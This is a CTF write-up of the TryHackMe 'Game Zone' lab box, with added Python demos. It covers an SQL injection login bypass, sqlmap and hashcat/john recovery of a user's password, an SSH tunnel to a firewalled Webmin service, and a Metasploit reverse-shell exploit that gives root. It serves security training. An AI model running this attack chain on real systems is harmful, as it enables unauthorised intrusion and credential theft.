CTF-Writeups/TryHackMe/Game_Zone.md
2020-11-05 23:01:26 +05:00


TryHackMe-Game Zone

NMAP

Nmap scan report for 10.10.76.196
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80

The login page on port 80 is vulnerable to SQL injection. Test it by entering ' or 1=1 -- (with a trailing space) as the username and leaving the password blank: the quote closes the username string, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the query, including the password check. MySQL only treats -- as a comment when it is followed by whitespace, which is why the trailing space matters.
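To make the bypass concrete, here is an added Python example (not code from the writeup or from the Game Zone box) showing the query shape that makes ' or 1=1 -- work, beside the parameterised version that is immune to it. The user table, the helper names and the use of SQLite instead of MySQL are assumptions for the demo; the payload and the agent47 credentials are the ones from this page.

```python
import sqlite3

# Constructed demo data: not the Game Zone box's real schema or rows.
USERS = [("agent47", "videogamer124"), ("admin", "s3cret")]

# The login bypass used on portal.php. The trailing space is what MySQL
# needs after "--"; SQLite does not need it but tolerates it.
PAYLOAD = "' or 1=1 -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def render_vulnerable_sql(username, password):
    """The query a string-concatenating login handler actually sends."""
    return ("SELECT username FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))


def login_vulnerable(conn, username, password):
    # Attacker-controlled text becomes SQL syntax: the quote ends the
    # string literal, "or 1=1" matches every row, "--" hides the rest.
    row = conn.execute(render_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterised query: the same input is only ever compared as data,
    # so "' or 1=1 -- " is looked up as a literal username and fails.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    return {
        "sql": render_vulnerable_sql(PAYLOAD, ""),
        "vulnerable": login_vulnerable(conn, PAYLOAD, ""),   # first row wins
        "safe": login_safe(conn, PAYLOAD, ""),               # no row matches
        "legit": login_safe(conn, "agent47", "videogamer124"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable query returns the first row of the table, so the attacker is logged in as whoever was inserted first, without knowing any password. Nothing about the fix is MySQL-specific: any driver's placeholder mechanism gives the same result.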

Burpsuite

Let's use Burp to capture the search request sent to portal.php so we can hand it to sqlmap to exfiltrate data.

Save the whole request (request line, headers and body) to a text file. sqlmap can replay a saved request with its -r option, which keeps the session cookie and the POST parameters exactly as the browser sent them.

Sqlmap

sqlmap dumped the following username and password hash. It is 64 hex characters with no salt, consistent with a raw SHA-256 digest: agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

Hashcat

hashcat -a 0 -m 1400 --user hash /usr/share/wordlists/rockyou.txt

Here -a 0 is the straight (dictionary) attack mode, -m 1400 selects raw SHA2-256, and --user tells hashcat that each line of the hash file is in user:hash format, so it strips the username before matching.

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA2-256
Hash.Target......: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218...3efd14
Time.Started.....: Thu Nov  5 21:26:24 2020 (1 sec)
Time.Estimated...: Thu Nov  5 21:26:25 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2992.0 kH/s (0.78ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2891776/14344385 (20.16%)
Rejected.........: 0/2891776 (0.00%)
Restore.Point....: 2887680/14344385 (20.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: vikes! -> vida82vida82

root@kali:~/TryHackMe/Easy/Game Zone# hashcat -a 0 -m 1400 --user --show  hash
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14:videogamer124

JohnTheRipper

john hash --wordlist=/usr/share/wordlists/rockyou.txt                                                         
Warning: detected hash type "gost", but the string is also recognized as "HAVAL-256-3"                                                              
Use the "--format=HAVAL-256-3" option to force loading these as that type instead                                                                   
Warning: detected hash type "gost", but the string is also recognized as "Panama"                                                                   
Use the "--format=Panama" option to force loading these as that type instead                                                                        
Warning: detected hash type "gost", but the string is also recognized as "po"                                                                       
Use the "--format=po" option to force loading these as that type instead                                                                            
Warning: detected hash type "gost", but the string is also recognized as "Raw-Keccak-256"                                                           
Use the "--format=Raw-Keccak-256" option to force loading these as that type instead                                                                
Warning: detected hash type "gost", but the string is also recognized as "Raw-SHA256"                                                               
Use the "--format=Raw-SHA256" option to force loading these as that type instead                                                                    
Warning: detected hash type "gost", but the string is also recognized as "skein-256"                                                                
Use the "--format=skein-256" option to force loading these as that type instead                                                                     
Warning: detected hash type "gost", but the string is also recognized as "Snefru-256"                                                               
Use the "--format=Snefru-256" option to force loading these as that type instead                                                                    
Warning: detected hash type "gost", but the string is also recognized as "Stribog-256"                                                              
Use the "--format=Stribog-256" option to force loading these as that type instead                                                                   
Using default input encoding: UTF-8                                                                                                                 
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])                                                                                              
Will run 4 OpenMP threads                                                                                                                           
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                       
0g 0:00:00:08 DONE (2020-11-05 21:30) 0g/s 1639Kp/s 1639Kc/s 1639KC/s !!12Honey..*7¡Vamos!                                                          
Session completed                                                                           
john --show --format=RAW-SHA256 hash
agent47:videogamer124

John's autodetection picked gost and the run cracked nothing (0g), because the 64-hex-character string is ambiguous between a dozen 256-bit formats. The warnings list Raw-SHA256 among them, so force it with --format=Raw-SHA256 on the cracking run as well as on --show. Either tool cracks this hash in seconds; the difference is only in how the format is specified, and the underlying reason is that the application stored an unsalted, unstretched SHA-256 of a rockyou.txt password.
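The following is an added Python example, not code from the writeup or from either cracking tool, that reimplements what hashcat -a 0 -m 1400 --user does on a user:hash file: hash each candidate once and look it up against every target digest. It uses the agent47 hash recovered above; the six-word wordlist is a constructed stand-in for rockyou.txt, and the function names are my own.

```python
import hashlib

# The user:hash line sqlmap pulled from the database (from this writeup).
HASH_FILE = "agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14\n"

# Constructed stand-in for rockyou.txt; a real run would stream the 14M-line file.
WORDLIST = ["password", "vikes!", "videogamer", "videogamer123",
            "videogamer124", "vida82vida82"]

HEX = set("0123456789abcdef")


def parse_hashes(text):
    """Parse 'user:hexdigest' lines (hashcat --user / john default input).

    Returns {digest: [users...]} so identical hashes are cracked together.
    """
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.lower()
        if len(digest) != 64 or not set(digest) <= HEX:
            raise ValueError(f"not a SHA-256 hex digest for {user}: {digest}")
        targets.setdefault(digest, []).append(user)
    return targets


def crack_sha256(text, wordlist):
    """Straight (dictionary) attack against unsalted SHA-256 hashes.

    Each candidate is hashed exactly once and checked against every
    remaining target with a dict lookup; the loop stops as soon as all
    targets are recovered, like hashcat's "Recovered: 1/1" condition.
    """
    targets = parse_hashes(text)
    found = {}
    for candidate in wordlist:
        digest = hashlib.sha256(candidate.encode()).hexdigest()
        for user in targets.pop(digest, []):
            found[user] = candidate
        if not targets:
            break
    return found


if __name__ == "__main__":
    for user, password in crack_sha256(HASH_FILE, WORDLIST).items():
        print(f"{user}:{password}")
```

The dict keyed by digest is the whole reason unsalted hashes fall in bulk: one SHA-256 per candidate covers every user in the dump at once. A per-user salt would force the inner work to be repeated for each target, and a slow KDF such as bcrypt or Argon2 would turn the 3 MH/s seen in the hashcat run above into a few thousand guesses per second.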

SSH (PORT 22)

Now that we have the username agent47 and the password videogamer124, we can SSH into the box. The same password is reused for the web application, SSH and, as it turns out later, Webmin; that reuse is what turns one cracked hash into full access.

Reverse SSH Port Forwarding

Reverse SSH port forwarding specifies that the given port on the remote (server) side is to be forwarded to the given host and port on the local side.

-L is a local forward (YOU <-- SERVER): ssh binds a port on your own machine and relays every connection to it through the SSH server to a host:port that the server can reach. If imgur were blocked at work, ssh -L 9000:imgur.com:80 user@example.com would make localhost:9000 on your machine serve imgur by way of example.com.

-R is a remote forward (YOU --> SERVER): ssh binds a port on the SSH server and relays connections to it back to a host:port reachable from your machine, so something on your side becomes visible to the remote host. Same idea as the example above, in reverse.

Run ss -tulpn on the box to list the listening sockets:

agent47@gamezone:~$ ss -tulpn
Netid State      Recv-Q Send-Q          Local Address:Port                         Peer Address:Port              
udp   UNCONN     0      0                           *:10000                                   *:*                  
udp   UNCONN     0      0                           *:68                                      *:*                  
tcp   LISTEN     0      80                  127.0.0.1:3306                                    *:*                  
tcp   LISTEN     0      128                         *:10000                                   *:*                  
tcp   LISTEN     0      128                         *:22                                      *:*                  
tcp   LISTEN     0      128                        :::80                                     :::*                  
tcp   LISTEN     0      128                        :::22                                     :::

There are 5 TCP sockets listening (22 twice, once on IPv4 and once on IPv6, plus 80, 3306 and 10000).

Port 10000 is bound to every interface but did not appear in the external nmap scan, so a firewall rule must be blocking it from the outside (the iptables rule list on the box confirms this; note that nmap reported the port as closed rather than filtered, so the rule rejects with a TCP reset instead of silently dropping the packet). Port 3306 (MySQL) is a different case: it is bound to 127.0.0.1 only, so it is simply not listening on the network. Either way, an SSH local forward lets us reach the port through the SSH session we already have!

From our local machine, run ssh -L 10000:localhost:10000 agent47@10.10.76.196 (localhost here is resolved on the remote box, so the forward lands on the service bound there).

Once connected, browse to localhost:10000 on your machine to reach the newly exposed web server.
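The check a practitioner actually wants at this step is the comparison between what the box listens on and what the outside scan showed. Here is an added Python example (not from the writeup) that parses the ss -tulpn output above, compares it with the open ports from the nmap scan at the top of the page, separates loopback-only services from firewalled ones, and prints the matching ssh -L command for each. The ss text is embedded as captured; the function names and the decision rules are my own.

```python
# The ss -tulpn output captured on the box (from this writeup).
SS_OUTPUT = """\
Netid State      Recv-Q Send-Q          Local Address:Port                         Peer Address:Port
udp   UNCONN     0      0                           *:10000                                   *:*
udp   UNCONN     0      0                           *:68                                      *:*
tcp   LISTEN     0      80                  127.0.0.1:3306                                    *:*
tcp   LISTEN     0      128                         *:10000                                   *:*
tcp   LISTEN     0      128                         *:22                                      *:*
tcp   LISTEN     0      128                        :::80                                     :::*
tcp   LISTEN     0      128                        :::22                                     :::
"""

# TCP ports the external nmap scan reported open (from the scan at the top).
NMAP_OPEN = {22, 80}

LOOPBACK = {"127.0.0.1", "::1"}


def parse_ss(output):
    """Return {port: set(local addresses)} for every TCP LISTEN socket."""
    listeners = {}
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "tcp" or fields[1] != "LISTEN":
            continue  # header, UDP, and non-listening sockets
        addr, port = fields[4].rsplit(":", 1)   # ":::80" -> ("::", "80")
        listeners.setdefault(int(port), set()).add(addr)
    return listeners


def classify(listeners, external_open):
    """Split listeners into reachable, loopback-only and firewalled ports.

    A port bound only to loopback is not on the network at all; a port bound
    to a wildcard address that the external scan did not see is being
    filtered between us and the box.
    """
    result = {"external": set(), "loopback_only": set(), "filtered": set()}
    for port, addrs in listeners.items():
        if port in external_open:
            result["external"].add(port)
        elif addrs <= LOOPBACK:
            result["loopback_only"].add(port)
        else:
            result["filtered"].add(port)
    return result


def tunnel_commands(listeners, external_open, user, host):
    """One ssh -L per port we cannot reach directly, reusing the SSH login."""
    c = classify(listeners, external_open)
    hidden = sorted(c["loopback_only"] | c["filtered"])
    return [f"ssh -L {p}:localhost:{p} {user}@{host}" for p in hidden]


if __name__ == "__main__":
    listeners = parse_ss(SS_OUTPUT)
    print(classify(listeners, NMAP_OPEN))
    for cmd in tunnel_commands(listeners, NMAP_OPEN, "agent47", "10.10.76.196"):
        print(cmd)
```

Both hidden ports end up with the same kind of forward, but the reason differs: MySQL on 3306 was never exposed and needs no firewall to hide it, while Webmin on 10000 is exposed and relies on a firewall rule alone. That distinction matters when you write the finding up, because only the second one is a firewall bypass.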

PORT 10000

Log in with the same credentials (agent47:videogamer124).

Metasploit

msf5 > search webmin  1.580                                               
                                                                                                                                                    
Matching Modules                                                          
================                                                          
                                                                          
   #  Name                                         Disclosure Date  Rank       Check  Description                                                   
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File A
ccess                                                                     
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor                           
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution               
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution                
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE                               
                                                                                                                                                    
                                                                                                                                                    
Interact with a module by name or index, for example use 5 or use exploit/unix/webapp/webmin_upload_exec                                            
                                                                                                                                                    
msf5 > use 4                                                              

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options                                                                                       
                                                                                                                                                    
Module options (exploit/unix/webapp/webmin_show_cgi_exec):                                                                                          
                                                                          
   Name      Current Setting  Required  Description                                                                                                 
   ----      ---------------  --------  -----------                                                                                                 
   PASSWORD  videogamer124    yes       Webmin Password                                                                                             
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                
   RHOSTS    lo               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                          
   RPORT     10000            yes       The target port (TCP)                                                                                       
   SSL       false            yes       Use SSL                                                                                                     
   USERNAME  agent47          yes       Webmin Username                                                                                             
   VHOST                      no        HTTP server virtual host                                                                                    
                                                                          
                                                                                                                                                    
Exploit target:                                                                                                                                     
                                                                          
   Id  Name                                                               
   --  ----                                                               
   0   Webmin 1.580                                                       
                                                                          
                                                                                                                                                    
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit                                                                                            
                                                                          
[-] Exploit failed: An exploitation error occurred.                       
[*] Exploit completed, but no session was created.             

This failed because no payload was set. The module gets command execution through Webmin's show.cgi, so it needs a cmd/unix payload. Note the two addresses involved: RHOSTS is localhost and RPORT is 10000 because Webmin is only reachable through our SSH tunnel, while LHOST is our own VPN address, since the reverse shell connects back from the box directly to us and does not pass through the tunnel.

set PAYLOAD cmd/unix/reverse

Module options (exploit/unix/webapp/webmin_show_cgi_exec):      
                                     
   Name      Current Setting  Required  Description                       
   ----      ---------------  --------  -----------                       
   PASSWORD  videogamer124    yes       Webmin Password                   
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                
   RHOSTS    localhost        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                          
   RPORT     10000            yes       The target port (TCP)                                                                                       
   SSL       false            yes       Use SSL     
   USERNAME  agent47          yes       Webmin Username                   
   VHOST                      no        HTTP server virtual host          
                                     
                                     
Payload options (cmd/unix/reverse):
                                     
   Name   Current Setting  Required  Description                          
   ----   ---------------  --------  -----------                          
   LHOST  10.14.3.143      yes       The listen address (an interface may be specified)                                                             
   LPORT  4444             yes       The listen port                                                                                                
                                                                          
                                                                          
Exploit target:   
                                                                          
   Id  Name        
   --  ----                                                               
   0   Webmin 1.580                                                       
                                     
                                                                                                                                                    
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit                  
[*] Exploiting target 0.0.0.1                                                                 
[*] Started reverse TCP double handler on 10.14.3.143:4444                
[*] Attempting to login...                                                
[-] Authentication failed            
[*] Exploiting target 127.0.0.1      
[*] Started reverse TCP double handler on 10.14.3.143:4444 
[*] Attempting to login...           
[+] Authentication successfully                                           
[+] Authentication successfully                                           
[*] Attempting to execute the payload...                                                                                                            
[+] Payload executed successfully                                                                                                                   
[*] Accepted the first client connection...                                                                                                         
[*] Accepted the second client connection...                              
[*] Command: echo IMGwgkPDtJucxdvk;                                       
[*] Writing to socket A                                                   
[*] Writing to socket B                                                   
[*] Reading from sockets...                                               
[*] Reading from socket A                                                 
[*] A: "IMGwgkPDtJucxdvk\r\n"                                             
[*] Matching...                                                                                                                                     
[*] B is input...                                                                                                                                   
[*] Command shell session 1 opened (10.14.3.143:4444 -> 10.10.76.196:40646) at 2020-11-05 22:49:31 +0500                                            
[*] Session 1 created in the background.                                  

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0.1)

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...

pwd 
/usr/share/webmin/file/
id
uid=0(root) gid=0(root) groups=0(root)

Upgrading the shell to meterpreter with post/multi/manage/shell_to_meterpreter, with SESSION set to 1:

[*] Upgrading session ID: 1
pwd
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.14.3.143:4433 
[*] Sending stage (980808 bytes) to 10.10.76.196
[*] Meterpreter session 2 opened (10.14.3.143:4433 -> 10.10.76.196:44438) at 2020-11-05 22:57:31 +0500
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > pwd
[*] exec: pwd

/root/TryHackMe/Easy/Game Zone
msf5 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0
.1)
  2         meterpreter x86/linux  no-user @ gamezone (uid=0, gid=0, euid=0, egid=0) @ 10.10.76.196  10.14.3.143:4433 -> 10.10.76.196:44438 (10.10.7
6.196)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > pwd
/root
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: no-user @ gamezone (uid=0, gid=0, euid=0, egid=0)
meterpreter >